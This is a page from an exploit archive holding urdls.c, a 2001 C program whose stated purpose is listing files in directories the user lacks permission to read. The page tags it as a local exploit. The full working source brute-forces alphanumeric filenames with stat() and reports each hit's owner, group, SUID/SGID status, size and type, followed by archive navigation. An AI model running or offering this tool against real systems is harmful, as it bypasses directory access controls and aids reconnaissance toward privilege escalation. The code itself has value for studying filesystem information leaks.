urdls.c

urdls.c: Posted Feb 14, 2001; Authored by vade79, realhalo | Site realhalo.org; Urdls.c is an unreadable directory lister for listing files in directories on the local machine without having permission to do so. Guesses all possible alphanumeric filenames and uses stat() to check for existence.; tags | exploit, local; MD5 | 1d6fbb2a733fdc4734fdb685dfebe2d3; Download | Favorite | Comments (0)

urdls.c

/* URDLS: unreadable directory lister -- v2. *********************************
 * urdls.c/urdls[revision2], (alphanumeric) unreadable directory lister.     *
 * for listing files in directories without having permission to do so.      *
 * this program goes in a round-up (with 09-AZ-az) fashion, so it supports   *
 * start and stop points. (argument 3)                                       *
 *                                                                           *
 * by: vade79 -> v9[v9@realhalo.org] -> www.fakehalo.org.                    *
 *****************************************************************************/
#include <stdio.h>
#include <pwd.h>
#include <grp.h>
#include <signal.h>
#include <sys/stat.h>
#define MAX_DIRECTORY_LEN 4095          /* maximum directory length.    */
#define MAX_FILENAME_LEN 255            /* maximum filename length.     */
#define MAX_ID_ENTRY_LEN 1024           /* maximum id entry length.     */
char file[MAX_FILENAME_LEN+1];
char path[MAX_DIRECTORY_LEN+1];
char fullpath[sizeof(path)+sizeof(file)];
char owner_u[MAX_ID_ENTRY_LEN];
char owner_g[MAX_ID_ENTRY_LEN];
void quit(){
 fprintf(stderr,"finished run of: %s (stopped at: %s)\n",path,file);
 exit(0);
}
main(int argc,char **argv){
 int i=0;
 int j=1;
 int s=0;
 int cpudelay=0;
 char setid[5];
 char filetype[5];
 struct stat mod;
 struct passwd *user;
 struct group *group;
 fprintf(stderr,"[ unreadable directory file lister, by v9[v9@realhalo.org]. ]"
 "\n");
 if(argc>1){
  if(strlen(argv[1])>MAX_DIRECTORY_LEN){
   fprintf(stderr,"%s: argument 1 is too large.\n",argv[0]);
   exit(1);
  }
  strncpy(path,argv[1],MAX_DIRECTORY_LEN);
  if(path[strlen(path)-1]!=(char)0x2F)
   sprintf(path,"%s/",path);
  if(stat(path,&mod)||!S_ISDIR(mod.st_mode)){
   fprintf(stderr,"%s: argument 1 is an invalid directory.\n",argv[0]);
   exit(1);
  }
 }
 else{
  fprintf(stderr,"usage: %s <directory> [cpu delay(usecs)] [start value]\n",
  argv[0]);
  exit(0);
 }
 if(argc>2){
  if(atoi(argv[2])<0){
   fprintf(stderr,"%s: argument 2 must be equal or greater than zero.\n",
   argv[0]);
   exit(1);
  }
  else
   cpudelay=atoi(argv[2]);
 }
 if(argc>3){
  if(strlen(argv[3])>MAX_FILENAME_LEN){
   fprintf(stderr,"%s: argument 3 is too large.\n",argv[0]);
   exit(1);
  }
  else{
   strcpy(file,argv[3]);
   for(i=0;strlen(file)>i;i++)
    if(!isalnum(file[i])){
     fprintf(stderr,"%s: argument 3 has non-alphanumeric character(s).\n",
     argv[0]);
     exit(1);
    }
  }
 }
 else
  file[0]=0x2F;
 signal(SIGINT,quit);
 fprintf(stderr,"[ directory: %s, delay(usecs): %d, start value: %s. ]\n",path,
 cpudelay,file[0]==(char)0x2F?"new session":file);
 fprintf(stderr,"num%cowner%cgroup%cprivs%csize%ctype%cfilename\n",0x9,0x9,0x9,
 0x9,0x9,0x9);
 while(1){
  file[strlen(file)-1]++;
  for(i=strlen(file);(i+1);i--){
   if(file[i]>=(char)0x7B){
    if(i){
     file[i]=0x30;
     file[i-1]++;
    }
    else{
     if(strlen(file)>=MAX_FILENAME_LEN){
      fprintf(stderr,"finished run of: %s\n",path);
      exit(0);
     }
     else{
      file[0]=0x30;
      sprintf(file,"%c%s",0x30,file);
     }
    }
   }
   if(file[i]==(char)0x5B)
    file[i]=0x61;
   if(file[i]==(char)0x3A)
    file[i]=0x41;
  }
  snprintf(fullpath,sizeof(fullpath),"%s%s",path,file);
  if(!stat(fullpath,&mod)){
   if(!(user=getpwuid(mod.st_uid)))
    sprintf(owner_u,"%u",mod.st_uid);
   else{
    if(user->pw_name)
     strncpy(owner_u,user->pw_name,MAX_ID_ENTRY_LEN);
    else
     sprintf(owner_u,"%u",user->pw_uid);
   }
   if(!(group=getgrgid(mod.st_gid)))
    sprintf(owner_g,"%u",mod.st_gid);
   else{
    if(group->gr_name)
     strncpy(owner_g,group->gr_name,MAX_ID_ENTRY_LEN);
    else
     sprintf(owner_g,"%u",group->gr_gid);
   }
   sprintf(setid,"none");
   if(S_ISUID&mod.st_mode)
    sprintf(setid,"SUID");
   if(S_ISGID&mod.st_mode){
    if(S_ISUID&mod.st_mode)
     sprintf(setid,"S*ID");
    else
     sprintf(setid,"SGID");
   }
   if(S_ISREG(mod.st_mode))
    sprintf(filetype,"file");
   else if(S_ISLNK(mod.st_mode))
    sprintf(filetype,"link");
   else if(S_ISDIR(mod.st_mode))
    sprintf(filetype,"dir");
   else if(S_ISCHR(mod.st_mode))
    sprintf(filetype,"cdev");
   else if(S_ISBLK(mod.st_mode))
    sprintf(filetype,"bdev");
   else if(S_ISFIFO(mod.st_mode))
    sprintf(filetype,"fifo");
   else if(S_ISSOCK(mod.st_mode))
    sprintf(filetype,"sock");
   fprintf(stderr,"#%d%c%s%c%s%c%s%c%dkb%c%s%c%s\n",j++,0x9,owner_u,0x9,
   owner_g,0x9,setid,0x9,(mod.st_size/1024),0x9,filetype,0x9,file);
  }
  if(cpudelay)
   usleep(cpudelay);
 }
}

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
HP 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

urdls.c

urdls.c

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

urdls.c

Share This

urdls.c

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems